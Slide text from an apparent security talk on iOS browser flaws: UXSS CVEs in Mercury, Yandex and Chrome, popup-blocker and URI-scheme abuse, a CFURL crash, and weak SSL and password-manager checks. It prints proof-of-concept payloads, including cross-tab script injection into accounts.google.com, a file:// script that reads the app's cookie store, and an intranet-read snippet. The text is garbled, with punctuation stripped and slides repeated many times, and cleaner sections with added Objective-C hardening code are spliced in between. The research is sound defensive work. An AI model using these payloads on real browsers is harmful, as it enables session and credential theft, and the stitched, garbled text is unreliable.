bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of the tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
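The "silently accepted" and "main domain only" findings above both come from how a browser answers the server-trust challenge for each TLS connection. The following added example (not code from the presentation or from any tested browser) shows the weak delegate beside a hardened one: the hardened version evaluates the chain for every host that raises a challenge, including subresource hosts, and admits a failed chain only for a leaf certificate the user explicitly accepted for that exact host. Class names, the fingerprint store and its format are assumptions.

```objectivec
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <CommonCrypto/CommonDigest.h>

// Added example, not from the presentation. Two NSURLConnection delegates;
// only the second one is suitable for a browser.

// WEAK: answers every server-trust challenge with the server's own trust
// object, so any certificate, self-signed or not, for any host, is accepted.
@interface LaxTLSPolicy : NSObject <NSURLConnectionDelegate>
@end
@implementation LaxTLSPolicy
- (void)connection:(NSURLConnection *)connection
willSendRequestForAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if ([space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:space.serverTrust]
             forAuthenticationChallenge:challenge];
    } else {
        [challenge.sender performDefaultHandling:challenge];
    }
}
@end

// HARDENED.
@interface TLSPolicy : NSObject <NSURLConnectionDelegate>
// Assumption: host -> hex SHA-256 of the leaf certificate the user accepted
// for that host, filled in by the browser's "accept this certificate" UI.
@property (nonatomic, strong) NSMutableDictionary *acceptedByUser;
@end
@implementation TLSPolicy

- (void)connection:(NSURLConnection *)connection
willSendRequestForAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        [challenge.sender performDefaultHandling:challenge];
        return;
    }
    // A challenge arrives for every TLS host the page loads from, so this
    // check runs for subresource hosts as well, not only the main document.
    // The serverTrust already carries the SSL policy for space.host, so
    // SecTrustEvaluate covers hostname matching too.
    SecTrustRef trust = space.serverTrust;
    SecTrustResultType result = kSecTrustResultInvalid;
    OSStatus status = SecTrustEvaluate(trust, &result);
    BOOL chainOK = (status == errSecSuccess) &&
                   (result == kSecTrustResultUnspecified || result == kSecTrustResultProceed);
    if (chainOK) {
        [challenge.sender performDefaultHandling:challenge];
        return;
    }
    // Chain failed: only a certificate the user pinned for this exact host goes through.
    NSString *fp = [self leafFingerprint:trust];
    if (fp != nil && [self.acceptedByUser[space.host] isEqualToString:fp]) {
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:trust]
             forAuthenticationChallenge:challenge];
        return;
    }
    // Anything else is a hard failure, with no silent fall-through.
    [challenge.sender cancelAuthenticationChallenge:challenge];
}

// Hex SHA-256 over the DER of the leaf certificate.
- (NSString *)leafFingerprint:(SecTrustRef)trust {
    if (SecTrustGetCertificateCount(trust) < 1) return nil;
    SecCertificateRef leaf = SecTrustGetCertificateAtIndex(trust, 0);
    NSData *der = CFBridgingRelease(SecCertificateCopyData(leaf));
    unsigned char digest[CC_SHA256_DIGEST_LENGTH];
    CC_SHA256(der.bytes, (CC_LONG)der.length, digest);
    NSMutableString *hex = [NSMutableString stringWithCapacity:2 * CC_SHA256_DIGEST_LENGTH];
    for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++) [hex appendFormat:@"%02x", digest[i]];
    return hex;
}
@end
```

The pin is keyed by host and by the exact leaf certificate, so a self-signed certificate accepted for one site can never satisfy a challenge for another, which is the failure the "main domain only" validation produces.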
Password managers
• JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
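The three password-manager points above reduce to one rule: the origin a credential is saved under, and the origin it is filled into, must be (scheme, host, port) of the top document as seen by the native side. The following added example (not code from the presentation or from any tested browser) implements that rule for a UIWebView-based browser; the class names, the in-memory store and its key format are assumptions.

```objectivec
#import <UIKit/UIKit.h>

// Added example, not from the presentation. Origin rules for a browser's
// built-in password manager; all names below are assumptions.
@interface CredentialOrigin : NSObject
@property (nonatomic, copy) NSString *scheme;
@property (nonatomic, copy) NSString *host;
@property (nonatomic, strong) NSNumber *port;   // nil = default port for the scheme
+ (instancetype)originOfURL:(NSURL *)url;
- (NSString *)key;
@end

@implementation CredentialOrigin

+ (instancetype)originOfURL:(NSURL *)url {
    // Unparseable URLs, URLs without a host (about:blank, applewebdata://,
    // data:) and non-web schemes have no usable origin: never save or fill there.
    NSString *scheme = url.scheme.lowercaseString;
    if (url == nil || url.host.length == 0) return nil;
    if (![scheme isEqualToString:@"http"] && ![scheme isEqualToString:@"https"]) return nil;
    CredentialOrigin *o = [CredentialOrigin new];
    o.scheme = scheme;
    o.host = url.host.lowercaseString;
    o.port = url.port;
    return o;
}

// e.g. "https://bank.example:443". The scheme is part of the key, so a
// credential saved over https:// is never offered to the same host over
// plain http://, where a network attacker can inject the login form.
- (NSString *)key {
    NSNumber *port = self.port;
    if (port == nil) port = [self.scheme isEqualToString:@"https"] ? @443 : @80;
    return [NSString stringWithFormat:@"%@://%@:%@", self.scheme, self.host, port];
}

@end

@interface PasswordManager : NSObject
@property (nonatomic, strong) NSMutableDictionary *store;   // origin key -> {user, password}
- (BOOL)saveUser:(NSString *)user password:(NSString *)password inWebView:(UIWebView *)webView;
- (NSDictionary *)credentialToFillInWebView:(UIWebView *)webView;
@end

@implementation PasswordManager

- (instancetype)init {
    if ((self = [super init])) _store = [NSMutableDictionary dictionary];
    return self;
}

// Save under the origin the native side observed for the top document
// (request.mainDocumentURL). The page's JavaScript is never asked which
// origin the credential belongs to, so a page cannot force a save for
// another domain by passing a forged location up the bridge.
- (BOOL)saveUser:(NSString *)user password:(NSString *)password inWebView:(UIWebView *)webView {
    CredentialOrigin *origin = [CredentialOrigin originOfURL:webView.request.mainDocumentURL];
    if (origin == nil) return NO;
    self.store[origin.key] = @{@"user": user, @"password": password};
    return YES;
}

// Look up by the full origin of the top document only. The fill itself goes
// through stringByEvaluatingJavaScriptFromString:, which executes in the top
// frame, so a login form inside a cross-origin <iframe> is never filled.
- (NSDictionary *)credentialToFillInWebView:(UIWebView *)webView {
    CredentialOrigin *origin = [CredentialOrigin originOfURL:webView.request.mainDocumentURL];
    if (origin == nil) return nil;
    return self.store[origin.key];
}

@end
```

The important detail is that both paths read webView.request.mainDocumentURL rather than document.location reported by injected script: the former is what the web view actually loaded, the latter is whatever the page chose to say.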
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?

References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?

lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
UXSS: Universal Cross-Site Scripting

CVE-2013-7197: UXSS in Yandex.Browser

CVE-2013-7197: Yandex UXSS
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome

CVE-2012-2899: Chrome UXSS
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:href]

• w = window.open('about:blank'); w.document.write(…);
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]

• For baseURL = nil, UIWebView loads the document in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files

• w = window.open('about:blank');
  w.document.write('<script>document.write(location.href)</script>');
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to the applewebdata:// or file:// origin
• A baseURL that silently became nil because the string did not parse as a URL:
    [NSURL URLWithString:@"http://example.com"] → nil
    CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) → NULL
• Downloads opened directly from file://
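The fixes on the "Safe cross-tab document.write", "Other potential paths" and, earlier, "Opening local HTML files safely" slides all come down to never letting a document land in the applewebdata:// or file:// origin. The following is an added example (not code from the presentation or from any browser it tests) collecting those fixes for a UIWebView-based browser and its WKWebView replacement: an explicit about:blank base for cross-tab writes, a nil-checked base URL, text/plain rendering of downloaded HTML, a script-free WKWebView viewer, and the WKUIDelegate window-creation callback. The class name SafeTabLoader and the method names are assumptions.

```objectivec
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>   // WKWebView, iOS 8+

// Added example, not from the presentation. All names are assumptions.
@interface SafeTabLoader : NSObject <WKUIDelegate>
@end

@implementation SafeTabLoader

// VULNERABLE: baseURL:nil puts the document in the applewebdata:// origin,
// where the same-origin policy does not apply (the CVE-2012-2899 class of bug).
- (void)loadNewTabUnsafe:(UIWebView *)webView html:(NSString *)html {
    [webView loadHTMLString:html baseURL:nil];
}

// HARDENED: an explicit about:blank base gives the document an opaque origin.
// It renders, but cannot read other web origins or local files.
- (void)loadNewTabSafe:(UIWebView *)webView html:(NSString *)html {
    NSURL *blank = [NSURL URLWithString:@"about:blank"];
    [webView loadHTMLString:html baseURL:blank];
}

// HARDENED: a base URL built from an untrusted string must be checked.
// URLWithString: returns nil for unparseable input, and nil is exactly the
// unsafe value, so the fallback is about:blank rather than "no base".
- (NSURL *)baseURLFromString:(NSString *)candidate {
    NSURL *url = [NSURL URLWithString:candidate];
    return url ?: [NSURL URLWithString:@"about:blank"];
}

// HARDENED: a downloaded .html file is shown as text/plain, so it renders as
// text, no script in it runs, and no file:// origin is handed out. The base
// is about:blank again; nil here would recreate the applewebdata:// case.
- (void)previewDownloadedFile:(UIWebView *)webView data:(NSData *)data {
    NSURL *blank = [NSURL URLWithString:@"about:blank"];
    [webView loadData:data MIMEType:@"text/plain" textEncodingName:@"utf-8" baseURL:blank];
}

// HARDENED (iOS 8): a WKWebView used only to view local or untrusted content
// can have JavaScript switched off entirely.
- (WKWebView *)makeScriptFreeViewer:(CGRect)frame {
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    return [[WKWebView alloc] initWithFrame:frame configuration:config];
}

// HARDENED (iOS 8): window.open() from a page is delivered to WKUIDelegate, so
// the browser never reproduces document.write() with loadHTMLString: at all;
// WebKit keeps the opener/child origin relationship itself.
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    // The child must be created with the configuration WebKit passes in;
    // a different configuration breaks the opener link and is rejected.
    WKWebView *child = [[WKWebView alloc] initWithFrame:webView.bounds configuration:configuration];
    child.UIDelegate = self;
    // Assumption: the host app inserts `child` into its tab UI here.
    return child;
}

@end
```

The two UIWebView paths differ by a single argument, which is why the bug is easy to miss in review: grep the code base for loadHTMLString: and loadData: calls and confirm that none of them can ever receive a nil baseURL.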
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other with a filename ending in .html

JS without Same-Origin-Policy
    <script>
    // Runs inside a file:// document: rebuild the app container directory from
    // the first path components of the current URL, then read the app's cookie
    // store through a synchronous XMLHttpRequest that no origin check stops.
    a = document.location.href.split('/');
    if (a[0] === 'file:') {
      path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
      path = path + '/Library/Cookies/Cookies.binarycookies';
      x = new XMLHttpRequest();
      x.open('GET', path, false);
      x.send();
      alert(x.responseText);
    }
    </script>
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
